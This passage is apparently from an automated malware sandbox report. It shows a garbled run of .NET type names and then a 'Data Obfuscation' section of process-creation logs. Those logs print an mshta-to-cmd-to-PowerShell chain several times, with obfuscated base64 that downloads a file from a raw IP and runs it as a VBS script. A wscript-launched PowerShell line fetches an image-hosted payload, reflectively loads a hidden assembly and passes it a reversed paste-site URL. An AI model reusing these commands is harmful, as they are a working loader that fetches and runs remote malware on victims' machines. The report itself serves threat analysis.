lib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib
                        Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.pdb source: powershell.exe, 00000003.00000002.1845557104.000000000541F000.00000004.00000800.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
